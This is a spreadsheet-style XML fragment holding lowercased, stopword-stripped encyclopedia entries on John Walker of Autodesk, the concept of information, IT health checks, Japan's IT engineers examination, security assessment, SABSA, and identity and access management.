    <t>john walker computer programmer, author co-founder computer-aided design software company autodesk. recently recognized writing website fourmilab. early projects 1974/1975, walker wrote animal software, self-replicated univac 1100 machines. considered first computer viruses.walker also founded hardware integration manufacturing company marinchip. among things, marinchip pioneered translation numerous computer language compilers intel platforms. autodesk 1982, john walker programmers pooled us$59,000 start autodesk (autocad), began working several computer applications. first completed autocad, software application computer-aided design (cad) drafting. autocad begun life interactcad, written programmer michael riddle proprietary language. walker riddle rewrote program, established profit-sharing agreement product derived interactcad. walker subsequently paid riddle us$10 million rights.by mid-1986, company grown employees annual sales million. that year, walker resigned chairman president company, continuing work programmer. 1989, walker's book, autodesk file, published. describes experiences autodesk, based around internal documents (particularly email) company.walker moved switzerland 1991. 1994, resigned company, sixth-largest personal computer software company world, primarily sales autocad. walker owned million stock autodesk time. fourmilab publishes personal domain, "fourmi lab", designed play fermilab fourmi, french “ant”, early interests. site, walker publishes personal projects, including hardware random number generator called hotbits, along software writes freely distributes, earth moon viewer. another notable book called hacker's diet. digital imprimatur among things, noted frequently cited article entitled digital imprimatur: brother media internet genie back bottle, article internet censorship written 2003. published magazine knowledge, technology policy. article, walker argues increasing pressure limiting ability internet users voice ideas, well predicting internet censorship. walker said likely candidate usher calls "the digital imprimatur" digital rights management, drm. popular culture walker's interest artificial life prompted hire rudy rucker, mathematician science fiction author, work cellular automata software. rucker later drew experience autodesk silicon valley novel hacker ants, characters loosely based john walker. also right read amazon kindle remote deletion controversy references external links official website</t>
  </si>
  <si>
    <t>Information</t>
  </si>
  <si>
    <t>information abstract concept refers things power inform. natural process completely chaotic, observable pattern medium said convey amount information. whereas digital signals data convey information form discrete values, phenomena artifacts analog signals, poems, pictures, music sound convey information continuous form. information often processed layers: data available level processed information interpreted processed next level. example, written text symbol letter conveys information relevant word part word conveys information relevant phrase part phrase conveys information relevant sentence part information level interpreted becomes knowledge pertinent domain. digital signal base level information conveys bits interpreted symbols, letters, numbers, structures convey information available next level characteristic information subject interpretation processing. concept information used describe various concepts, including constraint, communication, control, data, form, education, knowledge, meaning, understanding, mental stimuli, pattern, perception, proposition, representation, entropy. derivation information signal message thought resolution ambiguity uncertainty arises interpretation patterns within signal message.information structured data. redundant data compressed optimal size, theoretical limit compression. information available collection data derived analysis. example, data collected single customer’s order restaurant. information available many orders analyzed, becomes knowledge business subsequently able identify popular least popular dish.information transmitted time, data storage, space, communication telecommunication. information expressed either content message direct indirect observation. that perceived construed message right, sense, information always conveyed content message. information encoded various forms transmission interpretation (for example, information encoded sequence signs, transmitted signal). also encrypted safe storage communication. uncertainty event measured probability occurrence. uncertainty inversely proportional probability occurrence. information theory takes advantage concluding uncertain events require information resolve uncertainty. typical unit information. 'that reduces uncertainty half'. other units used. example, information encoded "fair" coin flip log2(2/1) bit, fair coin flips log2(4/1) bits. 2011 science article estimated technologically stored information already digital bits 2007, year 2002 beginning digital information storage (with digital storage capacity bypassing analog first time). etymology english word "information" comes middle french enformacion/informacion/information criminal investigation' etymon, latin informatiō(n) 'conception, teaching, creation'.in english, "information" uncountable mass noun. information theory information theory scientific study quantification, storage, communication information. field fundamentally established works harry nyquist ralph hartley 1920s, claude shannon 1940s. field intersection probability theory, statistics, computer science, statistical mechanics, information engineering, electrical engineering. measure information theory entropy. entropy quantifies amount uncertainty involved value random variable outcome random process. example, identifying outcome fair coin flip (with equally likely outcomes) provides less information (lower entropy) specifying outcome roll (with equally likely outcomes). some important measures information theory mutual information, channel capacity, error exponents, relative entropy. important sub-fields information theory include source coding, algorithmic complexity theory, algorithmic information theory, information-theoretic security. there another opinion regarding universal definition information. lies fact concept changed along change various historical epochs, order find definition, necessary find common features patterns transformation. example, researchers field information petrichenko semenova based retrospective analysis changes concept information, give following universal definition: "information form transmission human experience (knowledge)." opinion, change essence concept information occurs various breakthrough technologies transfer experience (knowledge), i.e. appearance writing, printing press, first encyclopedias, telegraph, development cybernetics, creation microprocessor, internet, smartphones, etc. each form experience transfer synthesis previous ones. that variety definitions information, because, according dialectics "negation-negation", previous ideas information contained "filmed" form modern representation.applications fundamental topics information theory include source coding/data compression (e.g. files), channel coding/error detection correction (e.g. dsl). impact crucial success voyager missions deep space, invention compact disc, feasibility mobile phones development internet. theory also found applications areas, including statistical inference, cryptography, neurobiology, perception, linguistics, evolution function molecular codes (bioinformatics), thermal physics, quantum computing, black holes, information retrieval, intelligence gathering, plagiarism detection, pattern recognition, anomaly detection even creation. sensory input often information viewed type input organism system. inputs kinds; inputs important function organism (for example, food) system (energy) themselves. book sensory ecology biophysicist david dusenbery called causal inputs. other inputs (information) important associated causal inputs used predict occurrence causal input later time (and perhaps another place). some information important association information eventually must connection causal input. practice, information usually carried weak stimuli must detected specialized sensory systems amplified energy inputs functional organism system. example, light mainly (but only, e.g. plants grow direction lightsource) causal input plants animals provides information. colored light reflected flower weak photosynthesis visual system detects bee's nervous system uses information guide flower, often finds nectar pollen, causal inputs, serving nutritional function. representation complexity cognitive scientist applied mathematician ronaldo vigo argues information concept requires least related entities make quantitative sense. these are, dimensionally defined category objects subsets essence, representation words, conveys representational (and hence, conceptual) information vigo defines amount information conveys rate change complexity whenever objects removed under "vigo information", pattern, invariance, complexity, representation, information—five fundamental constructs universal science—are unified novel mathematical framework. among things, framework aims overcome limitations shannon-weaver information attempting characterize measure subjective information. influence leads transformation information type pattern influences formation transformation patterns. sense, need conscious mind perceive, much less appreciate, pattern. consider, example, dna. sequence nucleotides pattern influences formation development organism without need conscious mind. might argue though human consciously define pattern, example nucleotide, naturally involves conscious information processing. systems theory times seems refer information sense, assuming information necessarily involve conscious mind, patterns circulating (due feedback) system called information. words, said information sense something potentially perceived representation, though created presented purpose. example, gregory bateson defines "information" "difference makes difference".if, however, premise "influence" implies information perceived conscious mind also interpreted specific context associated interpretation cause transformation information knowledge. complex definitions "information" "knowledge" make semantic logical analysis difficult, condition "transformation" important point study information relates knowledge, especially business discipline knowledge management. practice, tools processes used assist knowledge worker performing research making decisions, including steps review information effectively derive value meaning reference metadata available establish relevant context, often many possible contexts derive knowledge information make decisions recommendations resulting knowledgestewart (2001) argues transformation information knowledge critical, lying core value creation competitive advantage modern enterprise. danish dictionary information terms argues information provides answer posed question. whether answer provides knowledge depends informed person. generalized definition concept "information" answer specific question". when marshall mcluhan speaks media effects human cultures, refers structure artifacts turn shape behaviors mindsets. also, pheromones often said "information" sense. technologically mediated information these sections using measurements data rather information, information cannot directly measured. 2007 estimated world's technological capacity store information grew (optimally compressed) exabytes 1986 informational equivalent less 730-mb cd-rom person (539 person) (optimally compressed) exabytes 2007. this informational equivalent almost cd-rom person 2007.the world's combined technological capacity receive information one-way broadcast networks informational equivalent newspapers person 2007.the world's combined effective capacity exchange information two-way telecommunication networks informational equivalent newspapers person 2007.as 2007, estimated information digital, mostly stored hard drives. 2020 total amount data created, captured, copied, consumed globally forecast increase rapidly, reaching 64.2 zettabytes 2020. over next five years 2025, global data creation projected grow zettabytes. records records specialized forms information. essentially, records information produced consciously by-products business activities transactions retained value. primarily, value evidence activities organization also retained informational value. sound records management ensures integrity records preserved long required. international standard records management, 15489, defines records "information created, received, maintained evidence information organization person, pursuance legal obligations transaction business". international committee archives (ica) committee electronic records defined record "recorded information produced received initiation, conduct completion institutional individual activity comprises content, context structure sufficient provide evidence activity".records maintained retain corporate memory organization meet legal, fiscal accountability requirements imposed organization. willis expressed view sound management business records information delivered "...six requirements good corporate governance...transparency; accountability; process; compliance; meeting statutory common requirements; security personal corporate information." semiotics michael buckland classified "information" terms uses: "information process", "information knowledge", "information thing".beynon-davies explains multi-faceted concept information terms signs signal-sign systems. signs considered terms four inter-dependent levels, layers branches semiotics: pragmatics, semantics, syntax, empirics. these four layers serve connect social world hand physical technical world other. pragmatics concerned purpose communication. pragmatics links issue signs context within signs used. focus pragmatics intentions living agents underlying communicative behaviour. words, pragmatics link language action. semantics concerned meaning message conveyed communicative act. semantics considers content communication. semantics study meaning signs association signs behaviour. semantics considered study link symbols referents concepts particularly signs relate human behavior. syntax concerned formalism used represent message. syntax area studies form communication terms logic grammar sign systems. syntax devoted study form rather content signs sign-systems. nielsen (2008) discusses relationship semiotics information relation dictionaries. introduces concept lexicographic information costs refers effort user dictionary must make first find, understand data generate information. communication normally exists within context social situation. social situation sets context intentions conveyed (pragmatics) form communication. communicative situation intentions expressed messages comprise collections inter-related signs taken language mutually understood agents involved communication. mutual understanding implies agents involved understand chosen language terms agreed syntax (syntactics) semantics. sender codes message language sends message signals along communication channel (empirics). chosen communication channel inherent properties determine outcomes speed communication take place, distance. application information study information cycle (addressed whole distinct components) great concern information technology, information systems, well information science. these fields deal processes techniques pertaining information capture (through sensors) generation (through computation, formulation composition), processing (including encoding, encryption, compression, packaging), transmission (including telecommunication methods), presentation (including visualization display methods), storage (such magnetic optical, including holographic methods), etc. information visualization (shortened infovis) depends computation digital representation data, assists users pattern recognition anomaly detection. information security (shortened infosec) ongoing process exercising diligence protect information, information systems, unauthorized access, use, disclosure, destruction, modification, disruption distribution, algorithms procedures focused monitoring detection, well incident response repair. information analysis process inspecting, transforming, modelling information, converting data actionable knowledge, support decision-making process. information quality (shortened infoq) potential dataset achieve specific (scientific practical) goal using given empirical analysis method. information communication represents convergence informatics, telecommunication audio-visual media content. also references further reading liu, alan (2004). laws cool: knowledge work culture information. university chicago press. bekenstein, jacob (august 2003). "information holographic universe". scientific american. (2): 58–65. bibcode:2003sciam.289b..58b. doi:10.1038/scientificamerican0803-58. pmid 12884539. gleick, james (2011). information: history, theory, flood. york, pantheon. lin, shu-kun (2008). "gibbs paradox concepts information, symmetry, similarity their relationship". entropy. (1): 1–5. arxiv:0803.2571. bibcode:2008entrp..10....1l. doi:10.3390/entropy-e10010001. s2cid 41159530. floridi, luciano (2005). information meaningful data?" (pdf). philosophy phenomenological research. (2): 351–70. doi:10.1111/j.1933-1592.2005.tb00531.x. hdl:2299/1825. s2cid 5593220. floridi, luciano (2005). "semantic conceptions information". zalta, edward (ed.). stanford encyclopedia philosophy (winter 2005 ed.). metaphysics research lab, stanford university. floridi, luciano (2010). information: very short introduction. oxford: oxford university press. logan, robert what information? propagating organization biosphere, symbolosphere, technosphere econosphere. toronto: demo publishing. nielsen, sandro (2008). "the effect lexicographical information costs dictionary making use". lexikos. 170–89. stewart, thomas (2001). wealth knowledge. york, doubleday. young, paul (1987). nature information. westport, greenwood publishing group. isbn 978-0-275-92698-4. kenett, shmueli, galit (2016). information quality: potential data analytics generate knowledge. chichester, united kingdom: john wiley sons. doi:10.1002/9781118890622. isbn 978-1-118-87444-8. external links semantic conceptions information review luciano floridi stanford encyclopedia philosophy principia cybernetica entry negentropy fisher information, paradigm science: introduction, uncertainty principles, wave equations, ideas escher, kant, plato wheeler. this essay continually revised light ongoing research. much information? 2003 attempt estimate much information created year (study produced faculty students school information management systems university california berkeley) danish) informationsordbogen.dk danish dictionary information terms informationsordbogen</t>
  </si>
  <si>
    <t>ITHC</t>
  </si>
  <si>
    <t>ithc, health check, security assessment required, part accreditation process, many government computer systems uk.an ithc generally performed external service provider, although ncsc personnel perform ithcs especially sensitive systems. touch applications infrastructure, involves element penetration testing.check scheme ithc providers, ncsc. references external links national cyber security centre (nscs) tigerscheme crest (council registered ethical security testers) cyber scheme</t>
  </si>
  <si>
    <t>Information-Technology Engineers Examination</t>
  </si>
  <si>
    <t>information-technology engineers examination (japanese: 情報処理技術者試験, hepburn: jōhō shori gijutsusha shiken, itee) group information technology examinations administered information technology promotion agency, japan (ipa). itee introduced 1969 japan's ministry international trade industry (miti), since changed hands twice, first japan information processing development corporation (jipdec) 1984, 2004. first examination categories, lower-level programmers upper-level programmers, years number categories increased twelve 2016. examinations carried course day; candidates morning test afternoon test. morning test assesses breadth candidate's subject-matter knowledge, afternoon test assesses candidate's ability apply knowledge. examinations pass rate: 1969 2010 15.4 million people took them, million successful average success rate percent). questions developed committee experts, continually updated reflect changes computer industry. examination categories also subject change based upon industry trends. itee examinations recognized qualifications several asian countries, including india, singapore, south korea, china, philippines, thailand, vietnam, myanmar, taiwan, bangladesh. history information technology engineers examination founded 1969 national examination japan's ministry international trade industry (miti). first, categories examination offered: class information technology engineer, aimed upper-level programmers, class information technology engineer, aimed lower level programmers. these categories followed 1971 special information technology engineer examination.in 1984, miti (then known ministry economy, trade industry, meti) handed administration examinations japan information processing development corporation (jipdec). jipdec received funding meti, organizations technically independent, shared close ties other. jipdec founded japan information technology engineers examination center (jitec) oversee actual running examinations.the 1980s introduction examination categories: information technology systems audit engineer examination 1986, online information technology engineer examination 1988. former aimed systems auditors, latter network engineers.the examination categories underwent major upheaval 1994. special information technology engineer examination expanded four separate examinations: applications engineer examination, systems analyst examination, project manager examination, systems administration engineer examination. online information technology engineer examination became network specialist examination, information technology systems auditor examination became systems auditor examination, three categories examination introduced: production engineer examination, database specialist examination, basic systems administrator examination. these followed categories 1996: advanced systems administrator examination applied microcontroller systems engineer examination.there another major change categories 2001. class information technology engineer examination became fundamental information technology engineer examination, class information technology engineer became applied information technology engineer examination. production engineer examination discontinued, information security administrator examination introduced.in 2004, administration examinations changed hands jipdec information-technology promotion agency (ipa). this followed 2006 introduction examination category, technical engineer (information security) examination.2009 introduction test, passport examination, others examination categories consolidated. systems analyst examination advanced systems administrator examination merged form strategist examination, technical engineer (information security) examination information security administrator examination merged form information security specialist examination. format examinations carried day, morning test afternoon tests. morning test multiple choice, aims test candidate's breadth knowledge material examined. afternoon test tests candidate's ability apply knowledge series case studies essay questions. afternoon test also aims test candidate's past experience.after examinations over, candidates allowed take question papers home them, answers questions made available online. candidates pass examinations receive certificates meti. these certificates show date awarded, expiration date.between 1969 2010, 15.4 million people took itee examinations, million people passed, giving average success rate percent. categories july 2016 examination categories, divided four levels. administration jitec bases scope difficulty exams advice committee experts computer industry academia. this committee investigates skills currently used engineers relevant examination category, uses base recommendations way, questions exams kept date evolving technologies. knowledge areas tested taken software engineering, information systems computer science.the examination categories also constantly reviewed ensure relevant current trends information technology keep consistent previous exams.the examination questions also developed committee consisting around experts. subcommittees charge question development, checking, question selection, given independent authority create questions. questions made exam, questions intended test breadth candidates' knowledge altered reused.in addition national examination status japan, itee also recognized professional credential several asian countries, including india, singapore, south korea, china, philippines, thailand, vietnam, myanmar, taiwan, bangladesh. references external links official website</t>
  </si>
  <si>
    <t>Information technology security assessment</t>
  </si>
  <si>
    <t>information technology security assessment security assessment) explicit study locate security vulnerabilities risks. background assessment, assessor full cooperation organization assessed. organization grants access facilities, provides network access, outlines detailed information network, etc. parties understand goal study security identify improvements secure systems. assessment security potentially useful security tests. purpose security assessment goal security assessment (also known security audit, security review, network assessment), ensure necessary security controls integrated design implementation project. properly completed security assessment provide documentation outlining security gaps project design approved corporate security policies. management address security gaps three ways: management decide cancel project, allocate necessary resources correct security gaps, accept risk based informed risk reward analysis. methodology following methodology outline forward effective means conducting security assessment. requirement study situation analysis security policy creation update document review risk analysis vulnerability scan data analysis report briefing sample report security assessment report include following information: introduction/background information executive management summary assessment scope objectives assumptions limitations methods assessment tools used current environment system description network diagrams, security requirements summary findings recommendations general control review result vulnerability test results risk assessment results including identified assets, threats, vulnerabilities, impact likelihood assessment, risk results analysis recommended safeguards criticisms shortcomings security risk assessments like many risk assessments actually quantitative represent risk actuarially-sound manner. measuring risk quantitatively significant impact prioritizing risks getting investment approval.quantitative risk analysis applied security major government study 2000. federal council commissioned study $100 million security investment department veterans affairs results shown quantitatively.[1] united states department veterans affairs professional certifications there common vendor-neutral professional certifications performing security assessment. cissp ccsp cism cisa iso/iec 27001:2013 auditor/lead auditor crisc qsa/isa automated security assessment tools there common tools automatic security assessment self/third party usage. panorays rapidfire tools beyond security veracode riskwatch solarwinds external links isc2 information systems audit control association sans institute references casas iii, victoriano. 2006. information security risk assessment model public university administrators." applied research project. texas state university. http://ecommons.txstate.edu/arp/109/</t>
  </si>
  <si>
    <t>Sherwood Applied Business Security Architecture</t>
  </si>
  <si>
    <t>sabsa (sherwood applied business security architecture) model methodology developing risk-driven enterprise information security architecture service management, support critical business processes. developed independently zachman framework, similar structure. primary characteristic sabsa model everything must derived analysis business requirements security, especially security enabling function business opportunities developed exploited. process analyzes business requirements outset, creates chain traceability strategy concept, design, implementation, ongoing ‘manage measure’ phases lifecycle ensure business mandate preserved. framework tools created practical experience support whole methodology. model layered, layer business requirements definition stage. lower layer level abstraction detail developed, going definition conceptual architecture, logical services architecture, physical infrastructure architecture finally lowest layer, selection technologies products (component architecture). sabsa model generic starting point organization, going process analysis decision-making implied structure, becomes specific enterprise, finally highly customized unique business model. becomes reality enterprise security architecture, central success strategic program information security management within organization. sabsa particular example methodology used (information technology) (operational technology) environments. sabsa matrix note: original sabsa matrix, still valid today, expanded comprehensive service management matrix updated detail terminology areas. words david lynas, sabsa author, "the sabsa matrix sabsa service management matrix updated since late 90s. redesigned deliver improvements feedback requested years. fundamentally changed structure principles matrices (very elements changed position) focussed terminology update consistency." versions downloaded (along 2009 revision sabsa white paper important documents like sabsa certification roadmap) sabsa members' site. references sabsa method external links sabsa website sabsa institute</t>
  </si>
  <si>
    <t>Identity-based security</t>
  </si>
  <si>
    <t>identity-based security type security focuses access digital information services based authenticated identity individual. ensures users digital services entitled receive. common form identity-based security involves login account username password. however, recent technology evolved fingerprinting facial recognition.while forms identity-based security secure reliable, none perfect contains flaws issues. history earliest forms identity-based security introduced 1960s computer scientist fernando corbató. during time, corbató invented computer passwords prevent users going people's files, problem evident compatible time-sharing system (c.t.s.s.), allowed multiple users access computer concurrently. fingerprinting however, although digital first introduced, dates back even century, king hammurabi sealing contracts fingerprints ancient babylon. evidence fingerprinting also discovered ancient china method identification official courts documents. introduced u.s. early 20th century prison systems method identification. hand, facial recognition developed 1960s, funded american intelligence agencies military. types identity-based security account login common form identity-based security password authentication involving login online account. most largest digital corporations rely form security, facebook, google, amazon. account logins easy register, difficult compromise, offer simple solution identity-based digital services. fingerprint fingerprint biometric authentication another type identity-based security. considered secure forms identification reliability accessibility, addition extremely hard fake. fingerprints also unique every person, lasting lifetime without significant change. currently, fingerprint biometric authentication commonly used police stations, security industries, well smart-phones. facial recognition facial recognition operates first capturing image face. then, computer algorithm determines distinctiveness face, including limited location, shape chin, distance nose. algorithm converts information database, data enough detail distinguish face another. controversies issues account login problem form security tendency consumers forget passwords. average, individual registered online accounts requiring password, individuals vary passwords account. according study mastercard university oxford, "about third online purchases abandoned checkout consumers cannot remember passwords." consumer forget password, usually request password reset sent linked email account, delaying purchasing process. according article published phys org, 18.75% consumers abandon checkout password reset issues.when individuals uniform password across online platforms, makes login process much simpler hard forget. however, introduces another issue security breach account lead similar breaches remaining accounts, jeopardizing online security. this makes solution remembering passwords much harder achieve. fingerprint while fingerprinting generally considered secure reliable, physical condition one's finger scan drastically affect results. example, physical injuries, differing displacement, skin conditions lead faulty unreliable biometric information deny one's authorization.another issue fingerprinting known biometric sensor attack. attack, fake finger print finger used replacement fool sensors grant authentication unauthorized personnel. facial recognition facial recognition relies face individual identify grant access products, services, information. however, fraudulent limitations technology (lighting, image resolution) well changes facial structures time. there types failure facial recognition tests. first false positive, database matches image data data actual user's image. type failure false negative, database fails recognize face correct user. both types failure trade-offs accessibility security, make percentage type error significant. instance, facial recognition smart-phone would much rather instances false negatives rather false positives since optimal take several tries logging rather randomly granting stranger access phone. while ideal conditions perfect lighting, positioning, camera placement, facial recognition technology accurate 99.97%. however, conditions extremely rare therefore unrealistic. study conducted national institute standards technology (nist), video-recorded facial recognition accuracy ranged 94.4% depending camera placement well nature setting.aside technical deficiencies facial recognition, racial bias also emerged controversial subject. federal study 2019 concluded facial recognition systems falsely identified black asian faces times often white faces. also attribute-based access control federated identity identity-based conditional proxy re-encryption identity driven networking identity management system network security self-sovereign identity references</t>
  </si>
  <si>
    <t>Identity-management system</t>
  </si>
  <si>
    <t>identity management (idm), also known identity access management (iam idam), framework policies technologies ensure right users (that part ecosystem connected within enterprise) appropriate access technology resources. systems fall overarching umbrellas security data management. identity access management systems identify, authenticate, control access individuals utilizing resources also hardware applications employees need access.idm addresses need ensure appropriate access resources across increasingly heterogeneous technology environments meet increasingly rigorous compliance requirements.the terms "identity management" (idm) "identity access management" used interchangeably area identity access management.identity-management systems, products, applications platforms manage identifying ancillary data entities include individuals, computer-related hardware, software applications. covers issues users gain identity, roles, sometimes permissions identity grants, protection identity, technologies supporting protection (e.g., network protocols, digital certificates, passwords, etc.). definitions identity management management) identity access management (iam) organizational technical processes first registering authorizing access rights configuration phase, operation phase identifying, authenticating controlling individuals groups people access applications, systems networks based previously authorized access rights. identity management (idm) task controlling information users computers. such information includes information authenticates identity user, information describes data actions authorized access and/or perform. also includes management descriptive information user information accessed modified. addition users, managed entities typically include hardware network resources even applications. diagram shows relationship configuration operation phases iam, well distinction identity management access management. access control enforcement access rights defined part access authorization. digital identity entity's online presence, encompassing personal identifying information (pii) ancillary information. oecd nist guidelines protecting pii. interpreted codification identity names attributes physical instance facilitates processing. function real-world context engineering online systems, identity management involve five basic functions: pure identity function: creation, management deletion identities without regard access entitlements; user access (log-on) function: example: smart card associated data used customer service services traditional view); service function: system delivers personalized, role-based, online, on-demand, multimedia (content), presence-based services users devices. identity federation: system relies federated identity authenticate user without knowing password. audit function: monitor bottlenecks, malfunctions suspect behaviour. pure identity general model identity constructed small axioms, example identities given namespace unique, identities bear specific relationship corresponding entities real world. such axiomatic model expresses "pure identity" sense model constrained specific application context. general, entity (real virtual) multiple identities identity encompass multiple attributes, unique within given name space. diagram illustrates conceptual relationship identities entities, well identities attributes. theoretical practical models digital identity, given identity object consists finite properties (attribute values). these properties record information object, either purposes external model operate model, example classification retrieval. "pure identity" model strictly concerned external semantics properties. common departure "pure identity" practice occurs properties intended assure aspect identity, example digital signature software token model internally verify aspect identity satisfaction external purpose. extent model expresses semantics internally, pure model. contrast situation properties might externally used purposes information security managing access entitlement, simply stored, maintained retrieved, without special treatment model. absence external semantics within model qualifies "pure identity" model. identity management thus defined operations given identity model, generally, capabilities reference practice, identity management often expands express model content provisioned reconciled among multiple identity models. user access user access enables users assume specific digital identity across applications, enables access controls assigned evaluated identity. single identity given user across multiple systems eases tasks administrators users. simplifies access monitoring verification allows organizations minimize excessive privileges granted user. user access tracked initiation termination user access.when organizations deploy identity management process system, motivation normally primarily manage identities, rather grant appropriate access rights entities identities. words, access management normally motivation identity management sets processes consequently closely related. services organizations continue services internal users customers. many services require identity management properly provide services. increasingly, identity management partitioned application functions single identity serve many even organization's activities.for internal identity management evolving control access digital assets, including devices, network equipment, servers, portals, content, applications and/or products. services often require access extensive information user, including address books, preferences, entitlements contact information. since much information subject privacy and/or confidentiality requirements, controlling access vital. identity federation identity federation comprises systems share user access allow users based authenticating systems participating federation. this trust several systems often known "circle trust". setup, system acts identity provider (idp) system(s) acts service provider (sp). when user needs access service controlled first authenticate idp. upon successful authentication, sends secure "assertion" service provider. "saml assertions, specified using markup language intended describing security assertions, used verifier make statement relying party identity claimant. saml assertions optionally digitally signed." system capabilities addition creation, deletion, modification user identity data either assisted self-service, identity management controls ancillary entity data applications, contact information location. authentication verification entity who/what claims using password, biometrics fingerprint, distinctive behavior gesture pattern touchscreen. authorization managing authorization information defines operations entity perform context specific application. example, user might authorized enter sales order, different user authorized approve credit request order. roles roles groups operations and/or roles. users granted roles often related particular function. roles granted authorizations, effectively authorizing users granted role. example, user administrator role might authorized reset user's password, system administrator role might ability assign user specific server. delegation delegation allows local administrators supervisors perform system modifications without global administrator user allow another perform actions behalf. example, user could delegate right manage office-related information. interchange: saml protocol prominent means used exchange identity information identity domains. openid connect another protocol. privacy putting personal information onto computer networks necessarily raises privacy concerns. absent proper protections, data used implement surveillance society.social online social networking services make heavy identity management. helping users decide manage access personal information become issue broad concern. identity theft identity theft happens thieves gain access identity information personal details needed access bank account. research research related management identity covers disciplines technology, social sciences, humanities law.decentralized identity management identity management based decentralized identifiers (dids). european research within seventh research framework programme european union 2007 2013, several projects related identity management started. picos project investigates develops state-of-the-art platform providing trust, privacy identity management mobile communities.primelife develops concepts technologies help individuals protect autonomy retain control personal information, irrespective activities.swift focuses extending identity functions federation network addressing usability privacy concerns leverages identity technology integrate service transport infrastructures benefit users providers. ongoing projects ongoing projects include future identity information society (fidis), guide&lt; prime. publications academic journals publish articles related identity management include: ethics information technology identity information society surveillance societyless specialized journals publish topic instance special issues identity online information review. standardization (and specifically iso/iec jtc1, sc27 security techniques identity access management privacy techniques) conducting standardization work identity management (iso 2009), elaboration framework identity management, including definition identity-related terms. published standards current work items includes following: iso/iec 24760-1 framework identity management—part terminology concepts iso/iec 24760-2 framework identity management—part reference architecture requirements iso/iec 24760-3 framework identity management—part practice iso/iec 29115 entity authentication assurance iso/iec 29146 framework access management iso/iec 29003 identity proofing verification iso/iec 29100 privacy framework iso/iec 29101 privacy architecture iso/iec 29134 privacy impact assessment methodology organization implications organization normally role department responsible managing schema digital identities staff objects, represented object identities object identifiers (oid). organizational policies processes procedures related oversight identity management sometime referred identity governance administration (iga). commercial software tools exist help automate simplify organisational-level identity management functions. effectively appropriately tools used falls within scope broader governance, risk management, compliance regimes. since 2016 identity access management professionals professional organization, idpro. 2018 committee initiated publication annotated bibliography, listing number important publications, books, presentations videos. management systems identity-management system refers information system, technologies used enterprise cross-network identity management.additional terms used synonymously "identity-management system" include: access-governance systemidentity access management systementitlement-management system user provisioning systemidentity management, otherwise known identity access management (iam) identity security framework works authenticate authorize user access resources applications, data, systems, cloud platforms. seeks ensure right people provisioned right tools, right reasons. digital ecosystem continues advance, world identity management."identity management" "access identity management" aim) terms used interchangeably title identity management identity management falls umbrella security information privacy privacy risk well usability e-inclusion studies.there three components identity access management (iam): access management/single sign-on verify users’ identities access network applications identity governance ensure user access granted according appropriate access policies onboarding role/responsibility changes privileged access management control monitor access highly privileged accounts, applications system assetsthese technologies combined using identity governance, provides foundation automated workflows processes. modes identity management identity conceptualized three different modes, according analysis:from fidis network excellence: idem-identity: third-person (i.e., objectified) attribution sameness. such objectified perspective taken towards others also towards oneself. ipse-identity: ipse-identity perspective first-person perspective constitutes oneself continuous (idem) course time, experiencing multiplicity difference now. me-identity: ‘me’ mead) organised attitudes others assumes. coconstituted ‘i’, first person perspective, incorporates variety third person perspectives encounters develops. thus, ‘me’ continuously reconstituted face changing third person perspectives self.in bertino's takahashi's textbook, three categories identity defined degree overlapping fidis identity concepts: ”me-identity”: what define identity ”our-identity”: what others define identity ”their-identity”: what others define identity purposes using identity management systems identity management systems concerned creation, administration deployment identifiers: data used identify subject. credentials: data providing evidence claims identities parts thereof. attributes: data describing characteristics subject.the purposes identity management systems are: identification: user used logon database lookup authentication: real user? systems needs provide evidence! authorization non-repudiation: authorization documents transaction e-id often digital signature based e-id. generates non-repudiation receipts. commercial solutions identity-management systems, products, applications, platforms commercial identity-management solutions implemented enterprises organizations.technologies, services, terms related identity management include microsoft windows active directory, service providers, identity providers, services, access control, digital identities, password managers, single sign-on, security tokens, security token services (sts), workflows, openid, ws-security, ws-trust, saml 2.0, oauth, rbac. electronic identity management general, electronic said cover management form digital identities. focus identity management goes back development directories, x.500, namespace serves hold named objects represent real-life "identified" entities, countries, organizations, applications, subscribers devices. x.509 itu-t standard defined certificates carried identity attributes directory names: certificate subject certificate issuer. x.509 certificates systems operate prove online "identity" subject. therefore, terms, consider identity management management information held directory) represents items identified real life (e.g. users, organizations, devices, services, etc.). design systems requires explicit information identity engineering tasks. evolution identity management follows progression internet technology closely. environment static pages static portals early 1990s, corporations investigated delivery informative content "white pages" employees. subsequently, information changed (due employee turnover, provisioning de-provisioning), ability perform self-service help-desk updates efficiently morphed became known identity management today. solutions solutions fall category identity management include: management identities provisioning/de-provisioning accounts workflow automation delegated administration password synchronization self-service password resetaccess control password manager single sign-on (sso) single sign-on (web sso) role-based access control (rbac) attribute based access control (abac)directory services x.500 ldap microsoft active directory netiq edirectory identity repository (directory services administration user account attributes) metadata replication/synchronization directory virtualization (virtual directory) e-business scale directory systems next-generation systems composite adaptive directory services (cads) cads sdpother categories federation user access rights applications across otherwise untrusted networks directory-enabled networking 802.1x standards saml oauth openid liberty alliance consortium promoting federated identity management shibboleth (internet2) identity standards targeted towards educational environments global trust center central authentication service also references sources gross, ralph; acquisti, alessandro; heinz, (2005). "information revelation privacy online social networks". workshop privacy electronic society; proceedings 2005 workshop privacy electronic society. 71–80. doi:10.1145/1102199.1102214. isbn 978-1595932280. s2cid 9923609. halperin, ruth; backhouse, james (2008). roadmap research identity information society". identity information society (published 2009). (1): doi:10.1007/s12394-008-0004-0. lusoli, wainer; miltgen, caroline (2009). "young people emerging digital services. exploratory survey motivations, perceptions acceptance risks". scientific technical reports (published march 2009) (eur 23765 en). doi:10.2791/68925. isbn 9789279113307. iso, (2009). "information technology—security techniques—a framework identity management". iso/iec 24760 (working draft). {{cite journal}}: cite journal requires |journal= (help) pohlman, m.b. (2008). oracle identity management: governance, risk compliance architecture. auerbach publications. isbn 978-1-4200-7247-1. pounder, (2008). "nine principles assessing whether privacy protected surveillance society". identity information society (published 2009). doi:10.1007/s12394-008-0002-2. taylor, john lips, miriam; organ, (2009). "identification practices government: citizen surveillance quest public service improvement". identity information society. 135. doi:10.1007/s12394-009-0007-5. taylor, john (2008). "zero privacy". ieee spectrum. (7): doi:10.1109/mspec.2008.4547499. williamson, graham; yip, david; sharni, ilan; spaulding, kent september 2009). identity management: primer. press. isbn 978-1-58347-093-0. bernal bernabe, jorge; hernandez-ramos, jose skarmeta, antonio (2017). "holistic privacy-preserving identity management system internet things". mobile information systems. 2017 (6384186): 1–20. doi:10.1155/2017/6384186. external links general public tutorial privacy identity management identity management overview (computer weekly) secure widespread identities federated telecommunications (swift) identity management information sharing 18876 industrial automation systems integration data principles loosely-coupled identity management: slideshare stop remembering password switch identity management: business insider</t>
  </si>
